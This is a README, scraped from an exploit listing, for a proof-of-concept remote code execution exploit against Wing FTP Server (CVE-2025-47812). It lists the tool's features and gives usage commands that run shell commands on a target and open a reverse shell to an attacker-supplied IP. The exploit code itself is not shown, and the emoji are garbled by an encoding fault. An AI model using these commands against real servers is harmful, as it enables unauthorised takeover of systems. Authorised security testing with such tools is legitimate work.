## https://sploitus.com/exploit?id=80188E75-6D7C-5948-9425-B2436CA35A22
# CVE-2025-47812 - Wing FTP Server RCE Exploit
This repository provides a proof-of-concept exploit for **CVE-2025-47812**, a remote command execution (RCE) vulnerability in **Wing FTP Server**. An attacker can inject and execute arbitrary Lua-based system commands by abusing the `username` parameter during authentication, resulting in full remote code execution.
---
## ๐ Exploit Features
- ๐ง Remote execution of custom shell commands
- ๐งฌ Multiple built-in reverse shell payloads (bash, Python, netcat, etc.)
- ๐ชช Automatic UID extraction from Set-Cookie
- ๐ฆ Logs successful UIDs to `found_uids.txt`
- ๐งช Dry-run mode (no actual requests sent โ test your input/output logic safely)
- ๐ Retry logic on network failure
- ๐งน Cleaner payload formatting and readable output
- โ Input validation for IPs, ports, and URLs
- โ๏ธ Command-line argument support for automated workflows
---
## ๐ป Usage
**Execute a simple shell command:**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
```
Trigger a reverse shell:
```
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
```
Dry-run mode (no requests will be sent):
```
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
```
## ๐ Changes Made to the Original Exploit
| Feature/Improvement | Description |
|---------------------------|-----------------------------------------------------------------------------|
| โ **Argument Parsing** | Added `argparse` CLI support for non-interactive mode |
| ๐ **Input Validation** | Ensures valid URL/IP/port before attempting exploit |
| ๐ฆ **Header Refactoring** | Extracted HTTP headers into a reusable function for consistency |
| ๐ **UID Logging** | Saves successful UID tokens to `found_uids.txt` |
| ๐งช **Dry-Run Mode** | Allows safe testing without sending requests (`--dry-run`) |
| ๐ **Timeout + Retries** | Adds request timeout and automatic retry attempts on failure |
| ๐งผ **Payload Readability** | Reformatted the Lua injection string for clarity and maintenance |
| ๐ **Structured Output** | Wrapped server responses and payload info with delimiters for easy reading |
| โ ๏ธ **Status Code Checks** | Warns user if the target returns unexpected HTTP status codes |
| ๐ **Logging System** | Replaces `print()` with Python `logging` module for better verbosity control|
---
## โ ๏ธ Disclaimer
This project is intended for **educational and authorized security testing only**.
Do **not** use this tool against systems you do not own or have explicit permission to test.
---
---